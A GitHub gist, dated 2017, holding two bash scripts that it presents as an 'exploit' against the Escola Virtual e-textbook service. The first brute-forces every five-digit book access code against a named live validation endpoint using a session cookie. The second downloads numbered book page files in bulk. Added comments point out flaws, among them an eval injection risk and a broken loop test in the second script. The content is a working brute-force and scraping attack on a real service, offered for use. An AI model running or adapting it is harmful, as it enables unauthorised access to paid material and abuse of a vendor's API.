@ljmf00
Created June 9, 2017 23:29
Escola Virtual exploit that makes a brute-force attack on the web API
#!/bin/bash
# Walks a five-digit access-code space in increasing order and submits each
# candidate to the endpoint named in the loop below. The three variables here
# are the script's only inputs.
INPUT_BOOK=1 # integer counter, advanced once per request by increment()
STR_BOOK_ID="00001" # INPUT_BOOK zero-padded to five digits; increment() keeps it in sync
INPUT_COOKIES="" #PHPSESSID Cookie ID
# The PHPSESSID value is a live session credential: it is spliced into the
# curl command line built below, so it is visible in process listings while
# each request runs (and in trace output if the shell is started with -x).
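increment()
{
  # Advance the counter and refresh its zero-padded string form.
  # Globals:  INPUT_BOOK  (read, then written: incremented by one)
  #           STR_BOOK_ID (written: INPUT_BOOK padded with leading zeros to
  #                        five digits; wider values are left unpadded)
  # Replaces the original five-way if/elif ladder — two of whose branches
  # produced the same result — with a single printf, which yields identical
  # strings for every non-negative counter value.
  # Assignment form rather than (( INPUT_BOOK++ )) so the function's exit
  # status never reflects the arithmetic result.
  INPUT_BOOK=$((INPUT_BOOK + 1))
  printf -v STR_BOOK_ID '%05d' "$INPUT_BOOK"
}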
# Main loop: one POST per candidate code, in strictly increasing order, until
# the counter reads 99999 (the test is a string comparison, so the value 99999
# itself is never submitted).
while [ $INPUT_BOOK != 99999 ]
do
echo $STR_BOOK_ID
# The whole request is assembled as one string and re-parsed by eval below:
# INPUT_COOKIES and STR_BOOK_ID are spliced into single-quoted arguments, so a
# value containing a quote alters the command itself rather than the header.
# Every request carries the same fixed User-Agent and Referer and the same
# PHPSESSID while accessCode increments by one — exactly the pattern a
# server-side rate limit or per-session failure counter would key on.
CMD="curl 'https://library.escolavirtual.pt/librarystudent/validateBookAccessCode' -H 'Host: library.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://library.escolavirtual.pt/librarystudent/empty' -H 'Cookie: PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' --data 'accessCode=$STR_BOOK_ID.02'"
#echo $CMD
eval $CMD
echo "" # blank line between consecutive responses on stdout
increment
done
#!/bin/bash
# Fetches numbered page files from a base URL, one request per four-digit
# page number, saving each under book/. The variables here are the inputs
# read by increment() and by the loop below.
INPUT_BOOK=1 # integer page counter, advanced once per request by increment()
MAX_BOOK_PAGES=1 # intended upper bound on the page number; read by the loop condition
STR_BOOK_ID="0001" # INPUT_BOOK zero-padded to four digits; increment() keeps it in sync
INPUT_COOKIES="" #PHPSESSID Cookie ID
BOOK_PUBLIC_PATH="" #Public Book Web-based Path
# As in the companion script, the PHPSESSID value ends up on the curl command
# line and is therefore exposed in process listings for the duration of each
# request.
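increment()
{
  # Advance the page counter and refresh its zero-padded string form.
  # Globals:  INPUT_BOOK  (read, then written: incremented by one)
  #           STR_BOOK_ID (written: INPUT_BOOK padded with leading zeros to
  #                        four digits; wider values are left unpadded)
  # Replaces the original if/elif ladder — whose last two branches were
  # identical — with a single printf that produces the same strings for every
  # non-negative counter value.
  # Assignment form rather than (( INPUT_BOOK++ )) so the function's exit
  # status never reflects the arithmetic result.
  INPUT_BOOK=$((INPUT_BOOK + 1))
  printf -v STR_BOOK_ID '%04d' "$INPUT_BOOK"
}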
# Main loop: one GET per page number until the counter passes MAX_BOOK_PAGES.
# NOTE(review): the bare parentheses in this test are shell grouping syntax,
# not arithmetic, so bash rejects this line as written; the loop never runs.
while [ $INPUT_BOOK != ($MAX_BOOK_PAGES + 1) ]
do
echo $STR_BOOK_ID
# Request string re-parsed by eval below; BOOK_PUBLIC_PATH, STR_BOOK_ID and
# INPUT_COOKIES are interpolated into single-quoted arguments, so a quote in
# any of them changes the command rather than the URL or header. The Cookie
# header also carries a ZDEDebuggerPresent value alongside the session id —
# presumably copied from a browser capture. Output goes to book/<id>.svgz.
CMD="curl '$BOOK_PUBLIC_PATH/page$STR_BOOK_ID.svgz' -H 'Host: www.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Referer: $BOOK_PUBLIC_PATH/page$STR_BOOK_ID.xhtml' -H 'Cookie: ZDEDebuggerPresent=php,phtml,php3; PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' -o book/$STR_BOOK_ID.svgz"
#echo $CMD
eval $CMD
echo "" # blank line between consecutive downloads on stdout
increment
done